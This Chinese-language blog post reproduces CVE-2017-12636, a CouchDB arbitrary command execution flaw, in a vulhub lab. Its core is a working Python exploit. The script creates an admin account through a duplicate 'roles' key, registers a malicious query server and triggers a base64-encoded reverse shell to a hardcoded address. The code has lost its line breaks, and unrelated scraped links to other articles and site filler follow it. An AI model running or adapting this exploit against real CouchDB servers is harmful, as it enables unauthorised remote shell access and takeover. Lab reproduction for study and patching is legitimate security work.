Couchdb 任意命令执行漏洞(CVE-2017-12636)复现
简介
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。
影响版本
小于 1.7.0 以及 小于 2.1.1
环境搭建
https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12636
执行如下命令启动Couchdb 1.6.0环境:
docker-compose up -d
漏洞复现
Poc
#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuthtarget = 'http://192.168.1.101:5984'
command = rb"""sh -i >& /dev/tcp/192.168.1.101/443 0>&1"""
version = 1session = requests.session()
session.headers = {'Content-Type': 'application/json'
}
# session.proxies = {
# 'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{"type": "user","name": "wooyun","roles": ["_admin"],"roles": [],"password": "wooyun"
}''')session.auth = HTTPBasicAuth('wooyun', 'wooyun')command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:host = session.get(target + '/_membership').json()['all_nodes'][0]session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')if version == 1:session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')
Couchdb 任意命令执行漏洞(CVE-2017-12636)复现相关推荐
- wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞(PwnScriptum)复现. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为 ...
- couchdb 任意命令执行漏洞(cve-2017-12636)
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和 ...
- couchdb 任意命令执行漏洞 cve-2017-12636
Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言 ...
- python直接执行代码漏洞_修复Python任意命令执行漏洞
Author:JoyChou@美丽联合安全 Date:20180605 1. 前言 今天遇到一个不好做白名单的Python命令执行漏洞修复的问题.由于是shell=True导致的任意命令执行,一开始大 ...
- 漏洞payload 靶机_学生会私房菜【20200707期】Wordpress 4.6 任意命令执行漏洞
学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:<Wordpress 4.6 任意命令执行漏洞> 作者介绍:AT ...
- FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)
#FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一.漏洞简介 Pippo是一款基于Java的Web框架.FastjsonEngine是其中的一个JSON处 ...
- eyoucms 1.5.5任意命令执行漏洞(0day)
eyoucms 1.5.5任意命令执行漏洞 文章目录 eyoucms 1.5.5任意命令执行漏洞 一.漏洞简介 二.漏洞影响 三.复现过程 漏洞位置 漏洞分析 漏洞利用 一.漏洞简介 eyoucms1 ...
- TamronOS IPTV系统 ping 任意命令执行漏洞
TamronOS IPTV系统 ping 任意命令执行漏洞 目录 系统简介 漏洞描述 漏洞复现 总结 系统简介 TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商.酒店.学 ...
- 通达OA v11.9 getdata任意命令执行漏洞复现+利用
1.产品简介 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台.包括流程审批.行政办 ...
最新文章
- [cocoapods]cocoapods问题解决
- mvc core2.1 Identity.EntityFramework Core 注册 (二)
- FFmpeg 源码学习(一):avformat_open_input 源码分析
- [Abp 源码分析]后台作业与后台工作者
- 怎么将手机QQ浏览器里面的文章分享给QQ好友
- Ceres Solver 非线性优化库
- 并发编程应用场景_linux网络编程之select函数的并发限制和poll函数应用举例
- 黑客入侵 - 认识黑客入侵的利器 嗅探软件
- linux 软件安装命令介绍
- python如何检验显著性差异_基于python的显著性检验
- python数学符号读法大全_数学符号读法大全
- Uninstalltool-专业卸载工具
- 开发一个商城小程序要多少钱
- 傻子也能看懂的迪杰斯特拉算法(转)
- 集成科大讯飞语音合成
- 计算机网络 华南理工大学期末重点 第二章 物理层 谢希仁
- 教你如何轻松做百度文库推广引流?
- 小米civi价格偏贵,要赢得消费者认可不容易
- 怎样从spring官网下载jar包呢?
- 毕业设计-基于协同过滤算法的高校图书书目推荐系统
热门文章
- Thinkpad导航键更换成上下翻页键
- matlab解决迷宫问题,用matlab处理蚂蚁迷宫问题
- 操作系统android的收银系统,基于Android的小微商户移动收银系统设计与实现
- 计算机二级C语言与专升本编程题(入门级),用函数isprime(x)判断[n,m](n<m)之间所有的素数,并求其和
- IT架构设计_隽语集(Design Thinking _0801)
- 蓝牙耳机那个牌子好?看完这几款你就明白了
- 排列组合的写法_排列组合A几几的 C几几的怎么算
- Nineka南卡POW-1充电宝:让三台手机同时复活的神器
- 前端脚手架搭建(part 1)
- TokenSky大会组委会致全球嘉宾的一封感谢信